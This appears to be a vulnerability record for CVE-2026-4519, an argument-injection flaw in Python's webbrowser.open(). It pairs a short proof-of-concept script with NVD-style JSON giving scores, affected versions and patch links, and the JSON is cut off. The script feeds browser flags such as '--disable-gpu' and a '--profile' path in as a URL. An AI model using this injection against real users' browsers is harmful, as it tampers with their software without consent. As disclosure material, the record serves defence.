CVE-2026-4519

import webbrowser # PoC: Attempt to inject command line arguments into the browser # In vulnerable versions, the browser might interpret '--disable-gpu' as a flag malicious_url = "--disable-gpu" # Another example: "--profile=/tmp/malicious_profile" print(f"Attempting to open: {malicious_url}") try: webbrowser.open(malicious_url) except Exception as e: print(f"An error occurred: {e}")

{"cve": {"id": "CVE-2026-4519", "sourceIdentifier": "[email protected]", "published": "2026-03-20T15:16:24.057", "lastModified": "2026-04-16T14:53:22.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The webbrowser.open() API would accept leading dashes in the URL which \ncould be handled as command line options for certain web browsers. New \nbehavior rejects leading dashes. Users are recommended to sanitize URLs \nprior to passing to webbrowser.open()."}, {"lang": "es", "value": "La API webbrowser.open() aceptaba guiones iniciales en la URL que podrían ser interpretados como opciones de línea de comandos para ciertos navegadores web. El nuevo comportamiento rechaza los guiones iniciales. Se recomienda a los usuarios sanear las URL antes de pasarlas a webbrowser.open()."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.13.13", "matchCriteriaId": "74460139-CF2A-457B-82B4-7B655FB576B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.14.0", "versionEndExcluding": "3.14.4", "matchCriteriaId": "AA3B34C3-1E02-4674-8370-0DD4D24DBE58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "A3327507-0B1D-4F28-A983-D07A2C8A7696"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "C8AF17F1-A27F-4C98-BA5A-B4319710E8D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "24CF56B0-2F4E-42A2-B655-F493AA0A4815"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha4:*:*:*:*:*:*", "matchCriteriaId": "7184ABBA-B100-489E-B5C1-1C9EEC0546CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha5:*:*:*:*:*:*", "matchCriteriaId": "B6D4181B-3E1B-499B-AAB1-50868A6A6AD3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha6:*:*:*:*:*:*", "matchCriteriaId": "A52F6DD2-717D-4E8C-8DB7-00890BC1ABAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha7:*:*:*:*:*:*", "matchCriteriaId": "8C46C55C-801E-4F86-B669-8E6A12B4AB6F"}]}]}], "references": [{"url": "https://github.com/python/cpython/commit/3681d47a440865aead912a054d4599087b4270dd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/43fe06b96f6a6cf5cfd5bdab20b8649374956866", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/591ed890270c5697b013bf637029fb3e6cd2d73e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/594b5a05dc9913880ac92eded440defbf32a28d1 ... (truncated)